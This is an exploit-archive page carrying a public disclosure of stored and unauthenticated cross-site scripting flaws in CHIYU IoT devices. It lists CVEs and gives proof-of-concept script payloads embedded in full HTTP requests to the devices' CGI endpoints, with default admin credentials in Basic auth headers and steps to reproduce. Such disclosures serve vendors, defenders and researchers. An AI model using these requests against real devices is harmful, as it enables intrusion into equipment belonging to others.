what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CHIYU IoT Cross Site Scripting

CHIYU IoT Cross Site Scripting
Posted Jun 1, 2021
Authored by sirpedrotavares

CHIYU IoT devices suffer from multiple cross site scripting vulnerabilities. Versions affected include BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC.

tags | exploit, vulnerability, xss
advisories | CVE-2021-31250, CVE-2021-31641, CVE-2021-31643
SHA-256 | a0e148bec7337cb5cb6a2196c1eaeb2f732ddeb5e61a399ebf58969e953122ea

CHIYU IoT Cross Site Scripting

Change Mirror Download
# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
# Date: May 31 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
# CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.

#1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
CVE ID: CVE-2021-31250
CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250

============= PoC 01 ===============
Affected parameter: TF_submask
Component: if.cgi
Payload: "><script>alert(123)</script>

HTTP Request:
GET
/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/ap_tcps.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_submask)
4. Submit the request and observe payload execution

============= PoC 02 ===============
Affected parameter: TF_hostname=Component: dhcpc.cgi
Payload: /"><img src="#">
HTTP request and response:

HTTP Request:
GET
/dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/wan_dc.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (dhcpc.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_hostname)
4. Submit the request and observe payload execution

============= PoC 03 ===============
Affected parameter: TF_servicename=Component: ppp.cgi
Payload: "><script>alert(123)</script>

GET
/ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.143/wan_pe.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (ppp.cgi)
3. Append the payload at the end of the vulnerable parameter
(TF_servicename)
4. Submit the request and observe payload execution

============= PoC 04 ===============
Affected parameter: TF_port=Component: man.cgi
Payload: /"><img src="#">

GET
/man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (man.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_port)
4. Submit the request and observe payload execution



#2: Unauthenticated XSS in several CHIYU IoT devices
CVE ID: CVE-2021-31641
Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641


Component: any argument passed via URL that results in an HTTP-404
Payload: http://ip/<script>alert(123)</script>


Steps to reproduce:
1. Navigate to the webpage of the vulnerable device
2. On the web-browsers, you need to append the payload after the IP
address (see payload above)
3. Submit the request and observe payload execution


#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
CVE ID: CVE-2021-31643
Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643

Affected parameter: username=
Component: if.cgi
Payload: "><script>alert(1)</script>

HTTP request - SEMAC Web Ver7.2

GET
/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=; remote=00000000
Upgrade-Insecure-Requests: 1


HTTP request - BIOSENSE-III-COMBO(M1)(20000)

GET
/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (username)
4. Submit the request and observe payload execution
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close